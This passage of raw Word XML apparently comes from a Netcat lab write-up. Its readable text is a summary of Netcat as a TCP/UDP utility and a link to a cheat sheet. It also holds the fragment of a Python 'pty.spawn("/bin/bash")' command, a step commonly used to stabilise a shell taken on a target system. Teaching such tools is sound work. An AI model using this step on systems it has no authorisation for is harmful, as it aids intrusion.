        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6337E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6337E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6337E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B89F08" w14:textId="205AC856" w:rsidR="00A6337E" w:rsidRDefault="008568FC" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DD1D992" wp14:editId="73D6BC22">
            <wp:extent cx="5016321" cy="185523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86" cy="1864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45186" w14:textId="02566AB1" w:rsidR="008568FC" w:rsidRDefault="008568FC" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Summary –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847C13F" w14:textId="098EFD5B" w:rsidR="008568FC" w:rsidRDefault="008568FC" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>The Netcat utility program supports a wide range of commands to manage networks and monitor t</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>raffic data flow</w:t>
      </w:r>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> between systems. Computer networks, including the world wide web, are built on the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).  Think of it as a free and easy companion tool to use alongside Wireshark, which specializes in the analysis of network packets. The original version of Netcat was released back in 1995 and has received </w:t>
      </w:r>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>several</w:t>
      </w:r>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> iterative updates in the decades since.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29238F1B" w14:textId="7F62195D" w:rsidR="00B13281" w:rsidRPr="008568FC" w:rsidRDefault="00B13281" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">For more information about the features of Netcat, visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00EF2D26">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="36"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-PH"/>
          </w:rPr>
          <w:t>https://www.varonis.com/blog/netcat-commands/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a free cheat sheet of Netcat commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC46687" w14:textId="77777777" w:rsidR="008568FC" w:rsidRPr="00A6337E" w:rsidRDefault="008568FC" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF1DB9D" w14:textId="3AC00DAF" w:rsidR="00CA4827" w:rsidRPr="00EF2511" w:rsidRDefault="00CA4827" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0021E5" w14:textId="77777777" w:rsidR="002D762F" w:rsidRPr="002D762F" w:rsidRDefault="002D762F" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E6C943" w14:textId="77777777" w:rsidR="00A600A7" w:rsidRPr="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7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48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103CDCD6" w14:textId="77777777" w:rsidR="00A66F1D" w:rsidRDefault="00A66F1D"/>
    <w:sectPr w:rsidR="00A66F1D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4E60B5" w14:textId="77777777" w:rsidR="00D27BA7" w:rsidRDefault="00D27BA7" w:rsidP="00126CA6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7256616B" w14:textId="77777777" w:rsidR="00D27BA7" w:rsidRDefault="00D27BA7" w:rsidP="00126C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9A0A5" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126C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414356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6EB76B" w14:textId="742E5C52" w:rsidR="00126CA6" w:rsidRDefault="00126CA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4A4B96" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126CA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63727" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126C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44A7FD" w14:textId="77777777" w:rsidR="00D27BA7" w:rsidRDefault="00D27BA7" w:rsidP="00126CA6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D0DB187" w14:textId="77777777" w:rsidR="00D27BA7" w:rsidRDefault="00D27BA7" w:rsidP="00126C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B4198" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126CA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76DF1" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126CA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2D6559" w14:textId="77777777" w:rsidR="00126CA6" w:rsidRDefault="00126C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AD6349"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84F4EE4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YAAlMzU2MjAwNzYyUdpeDU4uLM/DyQAuNaAEHkcLUsAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00A600A7"/>
    <w:rsid w:val="00060DD6"/>
    <w:rsid w:val="000C518F"/>
    <w:rsid w:val="000E1703"/>
    <w:rsid w:val="00126CA6"/>
    <w:rsid w:val="0015467A"/>
    <w:rsid w:val="002D762F"/>
    <w:rsid w:val="003969EC"/>
    <w:rsid w:val="00431566"/>
    <w:rsid w:val="004458C1"/>
    <w:rsid w:val="0076154F"/>
    <w:rsid w:val="008568FC"/>
    <w:rsid w:val="0090617C"/>
    <w:rsid w:val="009B2C42"/>
    <w:rsid w:val="009E5DBD"/>
    <w:rsid w:val="00A31CDA"/>
    <w:rsid w:val="00A600A7"/>
    <w:rsid w:val="00A6337E"/>
    <w:rsid w:val="00A66F1D"/>
    <w:rsid w:val="00B13281"/>
    <w:rsid w:val="00BC00DE"/>
    <w:rsid w:val="00CA4827"/>
    <w:rsid w:val="00D22A81"/>
    <w:rsid w:val="00D27BA7"/>
    <w:rsid w:val="00D537EE"/>
    <w:rsid w:val="00EF2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0B5D2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8E193E5F-DD48-4A9D-8E53-767B30BB0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600A7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0A7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:eastAsia="en-PH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A600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337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6337E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B1328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26C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CA6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00126C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6C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572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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item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www.varonis.com/blog/netcat-commands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3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml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3.xml"/><Relationship Id="rId27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3" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="2ed94a41d966dadefce7d6cb6e267ff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4c3cb9bab2f6492a419f9f8c6078ec35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3E660743-517F-475D-B485-BDDD4FA085FE}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{35EA5934-E796-43CE-B6EE-E4447CCCE0ED}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D466F3C2-FFFE-45AD-8E24-F987487E15E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</TotalTime>
  <Pages>5</Pages>
  <Words>738</Words>
  <Characters>4210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 krahenbill</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cliff krahenbill</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-26T05:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-28T06:21:00Z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